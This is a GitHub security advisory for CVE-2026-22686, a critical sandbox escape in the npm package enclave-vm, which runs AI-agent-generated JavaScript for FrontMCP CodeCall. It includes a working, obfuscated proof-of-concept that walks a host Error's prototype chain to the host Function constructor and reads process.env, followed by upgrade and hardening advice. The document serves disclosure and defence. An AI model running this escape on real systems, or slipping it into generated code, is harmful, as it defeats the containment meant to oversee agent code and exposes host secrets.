GHSA-7QM7-455J-5P63

Vulnerability from github – Published: 2026-01-14 16:52 – Updated: 2026-01-15 17:46
Summary
enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain
Details

A critical sandbox escape vulnerability exists in enclave-vm (affected: < 2.6.0, patched: 2.7.0) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the host Node.js runtime.

When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor:

Error instance → Error.prototype → Error constructor → Function constructor

With access to the host Function constructor, an attacker can compile and execute arbitrary JavaScript in the host context — bypassing the sandbox boundary and potentially gaining access to sensitive resources such as process.env, filesystem, and network.

This breaks enclave-vm’s core security guarantee of isolating untrusted code.


Ecosystem Impact (FrontMCP / CodeCall)

FrontMCP is a TypeScript-first framework for building MCP servers, and the CodeCall plugin enables models to orchestrate large toolsets by generating and executing JavaScript plans.

Enclave is the defense-in-depth sandbox layer behind CodeCall (AST validation + runtime sandboxing). If you use FrontMCP CodeCall for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.


Live Playground (Safe Exploration & Testing)

To explore Enclave’s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground:

  • EnclaveVM Playground: https://enclave.agentfront.dev

This is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.


Timeline (Fast Fix)

  • Fix released: enclave-vm@2.7.0 (Jan 9, 2026)
  • Advisory published: Jan 13, 2026

Proof of Concept

⚠️ For defensive validation and maintainers. Do not run PoCs on hosts you don’t own/control.

```javascript
// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.

const s = (...args) => String.fromCharCode(...args);

const kCon    = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto  = s(95,95,112,114,111,116,111,95,95);           // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);
const kCode   = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);
const kPtype  = s(112,114,111,116,111,116,121,112,101);

try {
    const ObjectProto = Object[kPtype];
    const lookup = ObjectProto[kLookup];
    const getProtoNative = lookup.call(ObjectProto, kProto);

    let hostError;
    try {
        await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
    } catch (e) {
        hostError = e;
    }

    const errProto = getProtoNative.call(hostError);
    const ErrorCtor = errProto[kCon];
    const HostFunc = ErrorCtor[kCon];

    const exploitFn = HostFunc(kCode);
    return exploitFn();
} catch (e) {
    return e.message;
}
```

Mitigation / Remediation

Immediate action:

  • Upgrade enclave-vm to 2.7.0+

Defense-in-depth guidance:

  • Re-create all Error objects crossing the sandbox boundary inside the sandbox realm
  • Strip / freeze prototype chains of host objects
  • Prevent access to host Function constructors
  • Harden tool error handling to avoid leaking host-native objects

References

  • GitHub Security Advisory: https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63
  • npm package: https://www.npmjs.com/package/enclave-vm
  • Enclave repo: https://github.com/agentfront/enclave
  • FrontMCP docs: https://agentfront.dev/docs
  • CodeCall plugin overview: https://agentfront.dev/docs/plugins/overview
  • EnclaveVM Playground: https://enclave.agentfront.dev/


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "enclave-vm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-14T16:52:30Z",
    "nvd_published_at": "2026-01-14T00:15:49Z",
    "severity": "CRITICAL"
  },
  "id": "GHSA-7qm7-455j-5p63",
  "modified": "2026-01-15T17:46:45Z",
  "published": "2026-01-14T16:52:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22686"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/commit/ed8bc438b2cd6e6f0b5f2de321e5be6f0169b5a1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/enclave"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain"
}

